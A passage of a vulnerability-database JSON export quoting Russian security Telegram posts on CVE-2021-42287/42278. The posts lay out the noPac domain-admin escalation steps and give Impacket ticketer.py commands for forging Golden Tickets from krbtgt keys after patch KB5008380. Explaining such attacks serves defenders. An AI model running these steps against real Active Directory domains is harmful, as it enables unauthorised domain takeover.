\u044d\u0441\u043a\u0430\u043b\u0430\u0446\u0438\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 \u0434\u043e\u043c\u0435\u043d\u0435 Active Directory, \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043d\u0430 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 CVE-2021-42287 \u0438 CVE-2021-42278. \u041f\u0430\u0447\u043a\u0430 CVE, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u0441 \u044d\u0442\u0438\u043c\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c\u0438, \u043a\u0440\u0443\u0442\u0438\u0442\u0441\u044f \u0432 \u0442\u0432\u0438\u0442\u0442\u0435\u0440\u0430\u0445 \u0443\u0436\u0435 \u043e\u043a\u043e\u043b\u043e \u043c\u0435\u0441\u044f\u0446\u0430 \u0438 \u0431\u044b\u043b\u0430 \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u00ab\u043c\u0435\u043b\u043a\u043e\u043c\u044f\u0433\u043a\u0438\u043c\u0438\u00bb \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u043d\u043e\u044f\u0431\u0440\u044c\u0441\u043a\u043e\u0433\u043e Patch Tuesday. \u041d\u043e, \u043a\u0430\u043a \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e, \u043a\u0442\u043e \u043d\u0435 \u0443\u0441\u043f\u0435\u043b, \u0442\u043e\u0442 \u043e\u043f\u043e\u0437\u0434\u0430\u043b, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0434\u043e\u043c\u0435\u043d \u0430\u0434\u043c\u0438\u043d\u0430 \u043c\u044b \u0441 Acrono \u0432\u0441\u0435 \u0436\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438. 
\u0414\u0430\u043b\u0435\u0435 \u0440\u0430\u0441\u0441\u043a\u0430\u0436\u0443 (\u0438 \u043f\u043e\u043a\u0430\u0436\u0443), \u043a\u0430\u043a \u044d\u0442\u043e \u0434\u0435\u043b\u0430\u0435\u0442\u0441\u044f, \u043d\u043e \u0434\u043b\u044f \u043d\u0430\u0447\u0430\u043b\u0430 \u043d\u0435\u043c\u043d\u043e\u0433\u043e \u0442\u0435\u043e\u0440\u0438\u0438.\n\u25b6\ufe0f \u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a\n\n\u0414\u043d\u0435\u0432\u043d\u0438\u043a \u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u0438\u043a\u0430 \ud83d\udee1", "creation_timestamp": "2022-08-07T11:55:48.000000Z"}, {"uuid": "78f0244c-b005-4c71-9dee-4ad73e70004b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/poxek/2766", "content": "Domain Admin in a few seconds (CVE-2021-42278 | CVE-2021-42287)\n\n\u0422\u0430\u043a\u043e\u0439 \u0441\u043f\u043e\u0441\u043e\u0431 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u0443\u0436\u0435 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u043f\u043e\u0447\u0442\u0438 \u0434\u0432\u0430 \u0433\u043e\u0434\u0430, \u043e\u0434\u043d\u0430\u043a\u043e \u044d\u0442\u043e\u0442 \u0441\u043f\u043e\u0441\u043e\u0431 \u0430\u043a\u0442\u0443\u0430\u043b\u0435\u043d \u0438 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0439. \u0410 \u043a\u0430\u043a\u0438\u0435 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u044b \u043e\u043d\u043e \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442?\n\n1. 
\u041f\u043e \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u0443 \u0432 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430\u0445, \u043e\u0431\u044b\u0447\u043d\u044b\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0434\u043e\u043c\u0435\u043d\u0430 \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0441\u043e\u0435\u0434\u0438\u043d\u0438\u0442\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440 \u043a AD \u0442\u043e\u043b\u044c\u043a\u043e 10 \u0440\u0430\u0437. \n\u0427\u0442\u043e\u0431\u044b \u044d\u0442\u043e \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c, \u043c\u043e\u0436\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0443\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u0443:\n\nGet-ADObject -Identity (Get-ADDomain).DistinguishedName -Properties ms-DS-MachineAccountQuota\n\n\u0427\u0442\u043e\u0431\u044b \u043e\u0442\u043b\u0438\u0447\u0430\u0442\u044c \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0437\u0430\u043f\u0438\u0441\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043e\u0442 \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043e\u0432, \u043e\u043d\u0438 \u0434\u043e\u043b\u0436\u043d\u044b \u0438\u043c\u0435\u0442\u044c \u0432 \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u0435 sAMAccountName \u043d\u0430 \u043a\u043e\u043d\u0446\u0435 $. \u041e\u0434\u043d\u0430\u043a\u043e \u043f\u0440\u0438\u043a\u043e\u043b \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u044d\u0442\u043e\u0442 \u0441\u0438\u043c\u0432\u043e\u043b \u043d\u0435 \u0432\u0441\u0435\u0433\u0434\u0430 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442\u0441\u044f. 
\u0410\u0442\u0440\u0438\u0431\u0443\u0442\u043e\u043c \u0438\u043c\u0435\u043d\u0438 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f sAMAccountName. \u042d\u0442\u043e\u0442 \u0430\u0442\u0440\u0438\u0431\u0443\u0442 \u043c\u043e\u0436\u043d\u043e \u0443\u0432\u0438\u0434\u0435\u0442\u044c \u0438 \u043e\u0442\u0440\u0435\u0434\u0430\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0432\u0440\u0443\u0447\u043d\u0443\u044e \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e ADSIEdit Tool\n\n2. \u041f\u0440\u0438 \u0437\u0430\u043f\u0440\u043e\u0441\u0435 \u0431\u0438\u043b\u0435\u0442\u0430 \u043d\u0430 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0435 \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043f\u0440\u0435\u0434\u044a\u044f\u0432\u0438\u0442\u044c TGT. \u0415\u0441\u043b\u0438 \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u043c\u044b\u0439 \u0431\u0438\u043b\u0435\u0442 \u043d\u0435 \u043d\u0430\u0439\u0434\u0435\u043d KDC, KDC \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u043f\u043e\u0432\u0442\u043e\u0440\u043d\u044b\u0439 \u043f\u043e\u0438\u0441\u043a \u0441 \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c $. 
\u0415\u0441\u043b\u0438 TGT \u043f\u043e\u043b\u0443\u0447\u0435\u043d \u0434\u043b\u044f username, \u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c username \u0443\u0434\u0430\u043b\u0435\u043d, \u0442\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u044d\u0442\u043e\u0442 TGT \u0434\u043b\u044f \u0437\u0430\u043f\u0440\u043e\u0441\u0430 \u0441\u0435\u0440\u0432\u0438\u0441\u043d\u043e\u0433\u043e \u0431\u0438\u043b\u0435\u0442\u0430 \u0434\u043b\u044f \u0434\u0440\u0443\u0433\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0447\u0435\u0440\u0435\u0437  S4U2self  \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u0442 \u043a \u0442\u043e\u043c\u0443, \u0447\u0442\u043e KDC \u0431\u0443\u0434\u0435\u0442 \u0438\u0441\u043a\u0430\u0442\u044c username$ \u0432 AD. \n\n\u041e\u0431\u044a\u0435\u0434\u0438\u043d\u044f\u044f \u044d\u0442\u0438 \u0432\u0443\u043b\u043d\u044b, \u043c\u044b \u0438\u043c\u0435\u0435\u043c \u043f\u0440\u0438\u043c\u0435\u0440\u043d\u043e \u0442\u0430\u043a\u043e\u0439 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439\n\n\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442 TGT. \u0417\u0430\u0442\u0435\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043f\u044b\u0442\u0430\u0442\u044c\u0441\u044f \u0443\u0434\u0430\u043b\u0438\u0442\u044c \u0438\u043b\u0438 \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u0442\u044c \u0438\u0441\u0445\u043e\u0434\u043d\u0443\u044e \u0443\u0447\u0435\u0442\u043d\u0443\u044e \u0437\u0430\u043f\u0438\u0441\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430. 
\u041f\u043e\u043b\u0443\u0447\u0438\u0432 TGT, \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u043d\u0430\u0447\u0430\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c sAMAccountName. \u0410 \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u0437\u043d\u0430\u044f, \u0447\u0442\u043e KDC \u043f\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0442\u0438\u043a\u0435\u0442\u044b \u0438 \u0432\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0435 \u0441\u0435\u0430\u043d\u0441\u043e\u0432\u044b\u0435 \u043a\u043b\u044e\u0447\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430\u043c \u0432 \u0434\u043e\u043c\u0435\u043d\u0435, \u043c\u044b \u044d\u0442\u043e \u043c\u043e\u0436\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439\n\n\u0421\u0446\u0435\u043d\u0430\u0440\u0438\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u0442\u0430\u043a:\n\n1. \u0412 \u0434\u043e\u043c\u0435\u043d \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043d\u043e\u0432\u0430\u044f \u0443\u0447\u0435\u0442\u043d\u0430\u044f \u0437\u0430\u043f\u0438\u0441\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430.\n2. 
\u0421\u043e\u0437\u0434\u0430\u043d\u043d\u0430\u044f \u0443\u0447\u0435\u0442\u043d\u0430\u044f \u0437\u0430\u043f\u0438\u0441\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0438\u0438 \u0441 \u0438\u043c\u0435\u043d\u0435\u043c \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0433\u043e \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430\n3. \u0417\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442\u0441\u044f Kerberos TGT \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0438\u043c\u0435\u043d\u0438 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430.\n4. \u0421\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u0435 \u0438\u043c\u044f \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u0441\u043d\u043e\u0432\u0430 \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432 \u0438\u0441\u0445\u043e\u0434\u043d\u043e\u0435  \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435.\n5. 
\u0421\u0435\u0440\u0432\u0438\u0441\u043d\u044b\u0439 \u0431\u0438\u043b\u0435\u0442 Kerberos \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u044f S4U2self\n\n\u0417\u0432\u0443\u0447\u0438\u0442 \u0434\u0443\u0448\u043d\u043e, \u0431\u043b\u0430\u0433\u043e \u0435\u0441\u0442\u044c noPac, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442 \u0434\u0430\u043d\u043d\u0443\u044e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443\n\nTHX:\n\nhttps://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html\n\nhttps://github.com/elastic/detection-rules/blob/a5359ca675267220afedf67795cd1fd04881b2c8/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml\n\nhttps://github.com/WazeHell/sam-the-admin", "creation_timestamp": "2023-03-16T10:15:44.000000Z"}, {"uuid": "9ed3283f-dd41-40a7-a155-547fa04cee60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/CherepawwkaChannel/249", "content": "\ud83c\udfab\u041d\u0435\u043c\u043d\u043e\u0433\u043e \u043e Golden Ticket\ud83c\udfab\n\n\u0418\u0437\u0443\u0447\u0430\u044f \u0440\u0435\u0441\u0443\u0440\u0441\u044b \u043f\u043e \u0442\u0438\u043f\u0443 HackTricks, \u0432\u044b \u043c\u043e\u0433\u043b\u0438 \u043d\u0435\u043e\u0434\u043d\u043e\u043a\u0440\u0430\u0442\u043d\u043e \u0443\u0432\u0438\u0434\u0435\u0442\u044c \u0441\u043f\u043e\u0441\u043e\u0431 \u0432\u044b\u0434\u0430\u0447\u0438 \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0437\u043e\u043b\u043e\u0442\u043e\u0433\u043e \u0431\u0438\u043b\u0435\u0442\u0430 \u043f\u0440\u0438 
\u043f\u043e\u043c\u043e\u0449\u0438 ticketer.py \u0438\u0437 \u043d\u0430\u0431\u043e\u0440\u0430 Impacket\ud83d\udc69\u200d\ud83d\udcbb:\npython3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN randomuser\n\n\u041d\u043e \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0432 \u0441\u0435\u0431\u0435 \u0431\u0438\u043b\u0435\u0442 \u0442\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c, \u043f\u0440\u0438 \u043f\u043e\u043f\u044b\u0442\u043a\u0435 \u0435\u0433\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0432\u044b \u0443\u0432\u0438\u0434\u0438\u0442\u0435 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0443\u044e \u043e\u0448\u0438\u0431\u043a\u0443:\n[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)\n\u041e \u0447\u0435\u043c \u0433\u043e\u0432\u043e\u0440\u0438\u0442 \u044d\u0442\u0430 \u043e\u0448\u0438\u0431\u043a\u0430? \u0411\u0438\u043b\u0435\u0442 \u0431\u044b\u043b \u043e\u0442\u043e\u0437\u0432\u0430\u043d? \u041d\u043e \u043c\u044b \u0436\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0447\u0442\u043e \u0435\u0433\u043e \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438!\n\n\u0412\u0441\u044f \u043f\u0440\u0438\u0447\u0438\u043d\u0430 \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u043a\u0442\u043e-\u0442\u043e \u043d\u0435 \u0441\u043b\u0435\u0434\u0438\u0442 \u0437\u0430 \u043f\u0430\u0442\u0447-\u043d\u043e\u0443\u0442\u0430\u043c\u0438. \u0421 \u043d\u043e\u044f\u0431\u0440\u044f 2021 \u0433\u043e\u0434\u0430 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Microsoft \u043d\u0430\u0447\u0430\u043b\u0430 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 KB5008380, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0432\u0432\u043e\u0434\u0438\u043b\u043e\u0441\u044c \u0432 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u044d\u0442\u0430\u043f\u043e\u0432. 
\u0415\u0433\u043e \u0446\u0435\u043b\u044c\u044e \u0431\u044b\u043b\u0430 \u043d\u0435\u0439\u0442\u0440\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2021-42287, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u043b\u0430 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u043c\u0443 \u0431\u0435\u0437 \u043e\u0441\u043e\u0431\u044b\u0445 \u0443\u0441\u0438\u043b\u0438\u0439 \u043e\u043b\u0438\u0446\u0435\u0442\u0432\u043e\u0440\u044f\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u044b \u0434\u043e\u043c\u0435\u043d\u0430, \u0437\u043b\u043e\u0443\u043f\u043e\u0442\u0440\u0435\u0431\u043b\u044f\u044f Privilege Attribute Certificate (PAC) Kerberos\ud83d\uddbc\ufe0f\n\n\u0414\u043b\u044f \u0442\u0435\u0445, \u043a\u0442\u043e \u043d\u0435 \u0432 \u0442\u0435\u043c\u0435:\nPrivilege Attribute Certificate (PAC) \u2014 \u044d\u0442\u043e \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0439 \u0432 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0435 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 Kerberos, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0445\u0440\u0430\u043d\u0438\u0442 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e\u0431 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0438 \u043f\u0440\u0438\u043a\u0440\u0435\u043f\u043b\u044f\u0435\u0442\u0441\u044f \u043a \u0431\u0438\u043b\u0435\u0442\u0443 Kerberos, \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044f \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u0443\u044e 
\u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u0447\u043b\u0435\u043d\u0441\u0442\u0432\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0432 \u0433\u0440\u0443\u043f\u043f\u0430\u0445, \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u0445 \u0438 \u0434\u0440\u0443\u0433\u0438\u0445 \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u0430\u0445, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u0441 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c\u044e.\n\n\u0412\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u044f\u0441\u044c \u043a \u043f\u0430\u0442\u0447\u0443, Microsoft \u043e\u0431\u043d\u043e\u0432\u0438\u043b\u0430 PAC, \u0434\u043e\u0431\u0430\u0432\u0438\u0432 \u0434\u0432\u0435 \u043d\u043e\u0432\u044b\u0435 \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u0434\u0430\u043d\u043d\u044b\u0445: PAC_ATTRIBUTES_INFO \u0438 PAC_REQUESTOR. \u041d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0439 \u0447\u0430\u0441\u0442\u044c\u044e \u043f\u0430\u0442\u0447\u0430 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043d\u043e\u0432\u0430\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0430, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u0430\u044f \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u043e\u0439 PAC_REQUESTOR. \u0421 \u0435\u0451 \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u0435\u043c KDC \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u0438\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f (\u043a\u043b\u0438\u0435\u043d\u0442\u0430) \u0432 \u0431\u0438\u043b\u0435\u0442\u0435, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0440\u0430\u0437\u0440\u0435\u0448\u0430\u0435\u0442\u0441\u044f \u0432 SID, \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u044b\u0439 \u0432 PAC. 
\u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u0441 \u043e\u043a\u0442\u044f\u0431\u0440\u044f 2022 \u0433\u043e\u0434\u0430 \u043b\u044e\u0431\u043e\u0439 \u0431\u0438\u043b\u0435\u0442 \u0431\u0435\u0437 \u043d\u043e\u0432\u043e\u0439 \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b PAC (\u0438\u043b\u0438 \u0431\u0438\u043b\u0435\u0442 \u0434\u043b\u044f \u043d\u0435\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f) \u0431\u0443\u0434\u0435\u0442 \u043e\u0442\u043a\u043b\u043e\u043d\u0435\u043d. \u0415\u0441\u0442\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e, \u0435\u0441\u043b\u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043e.\n\u0412 \u044d\u0442\u043e\u043c \u0438 \u043a\u0440\u043e\u0435\u0442\u0441\u044f \u0441\u0443\u0442\u044c \u043e\u0448\u0438\u0431\u043a\u0438, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043c\u044b \u043c\u043e\u0433\u043b\u0438 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0442\u044c \u0432\u044b\u0448\u0435.\n\n\u0412\u043c\u0435\u0441\u0442\u0435 \u0441 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u043f\u043e\u0434\u0445\u043e\u0434 \u043a \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044e \u0437\u043e\u043b\u043e\u0442\u044b\u0445 \u0431\u0438\u043b\u0435\u0442\u043e\u0432 \u0442\u043e\u0436\u0435 \u0438\u0437\u043c\u0435\u043d\u0438\u043b\u0441\u044f. 
\u041c\u044b \u043d\u0435 \u043c\u043e\u0436\u0435\u043c \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0442\u044c Golden Ticket \u0434\u043b\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u043d\u043e \u043c\u043e\u0436\u0435\u043c \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u043c!\n\u0414\u043b\u044f \u043d\u0430\u0447\u0430\u043b\u0430 \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u0435 Impacket!\napt install python3-impacket\n\u041f\u043e\u0441\u043b\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0437\u043e\u043b\u043e\u0442\u043e\u0439 \u0431\u0438\u043b\u0435\u0442 \u043c\u043e\u0436\u043d\u043e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u043a\u043e\u043c\u0430\u043d\u0434\u043e\u0439:\npython3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN -user-id 1000 validuser\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u043e\u0431\u0440\u0430\u0442\u043d\u0430\u044f \u0441\u043e\u0432\u043c\u0435\u0441\u0442\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u043e \u0441\u0442\u0430\u0440\u044b\u043c PAC \u0442\u0430\u043a \u0436\u0435 \u043e\u0441\u0442\u0430\u043d\u0435\u0442\u0441\u044f:\npython3 ticketer.py -nthash $krbtgtRC4key -domain-sid $domainSID -domain $DOMAIN -old-pac username\n\n\u041f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u043f\u0440\u0438\u043c\u0435\u0440 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f Golden Ticket \u043d\u0430 \u043f\u0440\u0438\u043c\u0435\u0440\u0435 \u0443\u0436\u0435 \u0440\u0430\u0437\u043e\u0431\u0440\u0430\u043d\u043d\u043e\u0439 \u043c\u043d\u043e\u0439 